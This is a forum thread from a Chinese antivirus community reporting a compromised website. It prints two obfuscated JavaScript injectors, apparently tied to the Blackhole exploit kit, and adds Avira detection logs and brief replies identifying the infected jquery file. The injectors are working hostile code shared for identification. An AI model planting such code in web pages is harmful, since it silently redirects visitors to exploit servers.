收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 网络安全(毒网分析) http://www.guptafile.com/index.php
返回列表 发新帖
查看: 1474|回复: 2
收起左侧

[已鉴定] http://www.guptafile.com/index.php

[复制链接]
fireold
发表于 2013-11-10 11:01:32 | 显示全部楼层 |阅读模式

  2. /*d04bb5*/
  3. try {
  4.     if (window.document)--document.getElementById('12')
  5. } catch (qq) {
  6.     if (qq != null) ss = eval("St" + "ring");
  7. }
  8. a = "2e74837c7182777d7c2e88888874747436372e891b182e846f802e888782872e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b182e888782873c8180712e4b2e357682827e483d3d8585853c857d7d7281767372737b70807d77727380873c717d7b3d6f727b777c3d56746684455268873c7e767e35491b182e888782873c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a83827335491b182e888782873c8182877a733c707d807273802e4b2e353e35491b182e888782873c8182877a733c7673777576822e4b2e353f7e8635491b182e888782873c8182877a733c85777282762e4b2e353f7e8635491b182e888782873c8182877a733c7a7374822e4b2e353f7e8635491b182e888782873c8182877a733c827d7e2e4b2e353f7e8635491b181b182e77742e362f727d71837b737c823c757382537a737b737c82508757723635888782873537372e891b182e727d71837b737c823c858077827336354a7277842e77724b6a35888782876a354c4a3d7277844c3537491b182e727d71837b737c823c757382537a737b737c825087577236358887828735373c6f7e7e737c725176777a72368887828737491b182e8b1b188b1b1874837c7182777d7c2e617382517d7d79777336717d7d7977735c6f7b733a717d7d797773646f7a83733a7c526f87813a7e6f8276372e891b182e846f802e827d726f872e4b2e7c73852e526f82733637491b182e846f802e73867e7780732e4b2e7c73852e526f82733637491b182e77742e367c526f87814b4b7c837a7a2e8a8a2e7c526f87814b4b3e372e7c526f87814b3f491b182e73867e7780733c81738262777b7336827d726f873c75738262777b7336372e392e41443e3e3e3e3e384042387c526f878137491b182e727d71837b737c823c717d7d7977732e4b2e717d7d7977735c6f7b7339304b30397381716f7e7336717d7d797773646f7a8373371b182e392e304973867e778073814b302e392e73867e7780733c827d555b62618280777c7536372e392e36367e6f8276372e4d2e30492e7e6f82764b302e392e7e6f82762e482e303037491b188b1b1874837c7182777d7c2e557382517d7d797773362e7c6f7b732e372e891b182e846f802e81826f80822e4b2e727d71837b737c823c717d7d7977733c777c7273865d74362e7c6f7b732e392e304b302e37491b182e846f802e7a737c2e4b2e81826f80822e392e7c6f7b733c7a737c7582762e392e3f491b182e77742e362e362e2f81826f80822e372e34341b182e362e7c6f7b732e2f4b2e727d71837b737c823c717d7d7977733c818370818280777c75362e3e3a2e7c6f7b733c7a737c7582762e372e372e371b182e891b182e80738283807c2e7c837a7a491b182e8b1b182e77742e362e81826f80822e4b4b2e3b3f2e372e80738283807c2e7c837a7a491b182e846f802e737c722e4b2e727d71837b737c823c717d7d7977733c777c7273865d74362e3049303a2e7a737c2e37491b182e77742e362e737c722e4b4b2e3b3f2e372e737c722e4b2e727d71837b737c823c717d7d7977733c7a737c758276491b182e80738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e37491b188b1b1877742e367c6f8477756f827d803c717d7d797773537c6f707a7372371b18891b18777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491b181b188888887474743637491b188b1b188b1b18";
  9. z = [];
  10. for (i = 0; i < a.length; i += 2) {
  11.     z.push(parseInt(a.substr(i, 2), 16) - 14);
  12. }
  13. eval(ss["fr" + "omCharCode"].apply(ss, z)); /*/d04bb5*/

  15. /*32f02e*/
  16. r = eval;

  18. function vqvq() {
  19.     zva = function() {
  20.         --(d.body)
  21.     }()
  22. };
  23. a = ("47,155,174,165,152,173,160,166,165,47,172,170,151,166,162,67,100,57,60,47,202,24,21,47,175,150,171,47,172,173,150,173,160,152,104,56,150,161,150,177,56,102,24,21,47,175,150,171,47,152,166,165,173,171,166,163,163,154,171,104,56,160,165,153,154,177,65,167,157,167,56,102,24,21,47,175,150,171,47,172,170,151,166,162,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,172,170,151,166,162,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,150,64,164,150,174,173,154,172,65,156,166,171,150,152,154,171,65,153,154,66,73,173,152,76,157,122,124,167,65,167,157,167,56,102,24,21,47,172,170,151,166,162,65,172,173,200,163,154,65,167,166,172,160,173,160,166,165,47,104,47,56,150,151,172,166,163,174,173,154,56,102,24,21,47,172,170,151,166,162,65,172,173,200,163,154,65,152,166,163,166,171,47,104,47,56,70,73,67,71,74,56,102,24,21,47,172,170,151,166,162,65,172,173,200,163,154,65,157,154,160,156,157,173,47,104,47,56,70,73,67,71,74,167,177,56,102,24,21,47,172,170,151,166,162,65,172,173,200,163,154,65,176,160,153,173,157,47,104,47,56,70,73,67,71,74,167,177,56,102,24,21,47,172,170,151,166,162,65,172,173,200,163,154,65,163,154,155,173,47,104,47,56,70,67,67,67,70,73,67,71,74,56,102,24,21,47,172,170,151,166,162,65,172,173,200,163,154,65,173,166,167,47,104,47,56,70,67,67,67,70,73,67,71,74,56,102,24,21,24,21,47,160,155,47,57,50,153,166,152,174,164,154,165,173,65,156,154,173,114,163,154,164,154,165,173,111,200,120,153,57,56,172,170,151,166,162,56,60,60,47,202,24,21,47,153,166,152,174,164,154,165,173,65,176,171,160,173,154,57,56,103,167,47,160,153,104,143,56,172,170,151,166,162,143,56,47,152,163,150,172,172,104,143,56,172,170,151,166,162,67,100,143,56,47,105,103,66,167,105,56,60,102,24,21,47,153,166,152,174,164,154,165,173,65,156,154,173,114,163,154,164,154,165,173,111,200,120,153,57,56,172,170,151,166,162,56,60,65,150,167,167,154,165,153,112,157,160,163,153,57,172,170,151,166,162,60,102,24,21,47,204,24,21,204,24,21,155,174,165,152,173,160,166,165,47,132,154,173,112,166,166,162,160,154,57,152,166,166,162,160,154,125,150,164,154,63,152,166,166,162,160,154,135,150,163,174,154,63,165,113,150,200,172,63,167,150,173,157,60,47,202,24,21,47,175,150,171,47,173,166,153,150,200,47,104,47,165,154,176,47,113,150,173,154,57,60,102,24,21,47,175,150,171,47,154,177,167,160,171,154,47,104,47,165,154,176,47,113,150,173,154,57,60,102,24,21,47,160,155,47,57,165,113,150,200,172,104,104,165,174,163,163,47,203,203,47,165,113,150,200,172,104,104,67,60,47,165,113,150,200,172,104,70,102,24,21,47,154,177,167,160,171,154,65,172,154,173,133,160,164,154,57,173,166,153,150,200,65,156,154,173,133,160,164,154,57,60,47,62,47,72,75,67,67,67,67,67,61,71,73,61,165,113,150,200,172,60,102,24,21,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,47,104,47,152,166,166,162,160,154,125,150,164,154,62,51,104,51,62,154,172,152,150,167,154,57,152,166,166,162,160,154,135,150,163,174,154,60,24,21,47,62,47,51,102,154,177,167,160,171,154,172,104,51,47,62,47,154,177,167,160,171,154,65,173,166,116,124,133,132,173,171,160,165,156,57,60,47,62,47,57,57,167,150,173,157,60,47,106,47,51,102,47,167,150,173,157,104,51,47,62,47,167,150,173,157,47,101,47,51,51,60,102,24,21,204,24,21,155,174,165,152,173,160,166,165,47,116,154,173,112,166,166,162,160,154,57,47,165,150,164,154,47,60,47,202,24,21,47,175,150,171,47,172,173,150,171,173,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,160,165,153,154,177,126,155,57,47,165,150,164,154,47,62,47,51,104,51,47,60,102,24,21,47,175,150,171,47,163,154,165,47,104,47,172,173,150,171,173,47,62,47,165,150,164,154,65,163,154,165,156,173,157,47,62,47,70,102,24,21,47,160,155,47,57,47,57,47,50,172,173,150,171,173,47,60,47,55,55,24,21,47,57,47,165,150,164,154,47,50,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,172,174,151,172,173,171,160,165,156,57,47,67,63,47,165,150,164,154,65,163,154,165,156,173,157,47,60,47,60,47,60,24,21,47,202,24,21,47,171,154,173,174,171,165,47,165,174,163,163,102,24,21,47,204,24,21,47,160,155,47,57,47,172,173,150,171,173,47,104,104,47,64,70,47,60,47,171,154,173,174,171,165,47,165,174,163,163,102,24,21,47,175,150,171,47,154,165,153,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,160,165,153,154,177,126,155,57,47,51,102,51,63,47,163,154,165,47,60,102,24,21,47,160,155,47,57,47,154,165,153,47,104,104,47,64,70,47,60,47,154,165,153,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,163,154,165,156,173,157,102,24,21,47,171,154,173,174,171,165,47,174,165,154,172,152,150,167,154,57,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,172,174,151,172,173,171,160,165,156,57,47,163,154,165,63,47,154,165,153,47,60,47,60,102,24,21,204,24,21,160,155,47,57,165,150,175,160,156,150,173,166,171,65,152,166,166,162,160,154,114,165,150,151,163,154,153,60,24,21,202,24,21,160,155,57,116,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,60,104,104,74,74,60,202,204,154,163,172,154,202,132,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,63,47,56,74,74,56,63,47,56,70,56,63,47,56,66,56,60,102,24,21,24,21,172,170,151,166,162,67,100,57,60,102,24,21,204,24,21,204".split(","));
  24. d = document;
  25. for (i = 0; i < a.length; i += 1) {
  26.     a[i] = -(10 - 3) + parseInt(a[i], 4 + 4);
  27. }
  28. try {
  29.     vqvq()
  30. } catch (q) {
  31.     yy = 50 - 50;
  32. }
  33. try {
  34.     yy /= 72
  35. } catch (pq) {
  36.     yy = 1;
  37. }
  38. if (!yy) r(String["fr" + "omCh" + "arCo" + "de"].apply(String, a)); /*/32f02e*/
复制代码



Avira
2013/11/10 上午 10:54 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\alan\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\D24OYQIM\jquery-1.6.4.min[2].js'
      包含病毒或有害的程式 'JS/Blacole.EB.46' [virus]
      已採取動作:
      檔案會移動至 '5ae059fd.qua' 名稱底下的隔離區目錄!

2013/11/10 上午 10:54 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描.]。
      檔案數:        827
      目錄數:        0
      惡意程式碼數:        1
      警告數:        0

2013/11/10 上午 10:53 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描.]。
      檔案數:        826
      目錄數:        0
      惡意程式碼數:        0
      警告數:        0

2013/11/10 上午 10:53 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\alan\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\D24OYQIM\jquery-1.6.4.min[2].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.46 [virus]'
      執行的動作:傳輸至掃描程式

2013/11/10 上午 10:53 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\alan\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\D24OYQIM\jquery-1.6.4.min[2].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.46 [virus]'
      執行的動作:拒絕存取

2013/11/10 上午 10:53 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\alan\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\D24OYQIM\index[1].htm 中
      偵測到病毒或有害的程式 'JS/BlacoleRef.DD.40 [virus]'
      執行的動作:拒絕存取

2013/11/10 上午 10:53 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\alan\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\D24OYQIM\jquery-1.6.4.min[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.46 [virus]'
      執行的動作:拒絕存取

2013/11/10 上午 10:52 [Web Protection] 已停用 Web Protection
      服務已停用

2013/11/10 上午 10:52 [Web Protection] 封鎖的網頁
      URL (http://www.guptafile.com/index.php) 的評估結果為 惡意程式碼,而遭到封鎖.


av5.jpg


fs is

fs5.jpg
回复

举报

lzxkf
发表于 2013-11-10 11:23:34 | 显示全部楼层
这个针对什么漏洞的?我点进去了,卡巴没反应
回复

举报

fireold
 楼主| 发表于 2013-11-10 11:29:45 | 显示全部楼层
lzxkf 发表于 2013-11-10 11:23
这个针对什么漏洞的?我点进去了,卡巴没反应
http://www.guptafile.com/js/jquery-1.6.4.min.js infected with Exploit.BlackHole.196
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-4 13:56 , Processed in 0.138527 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表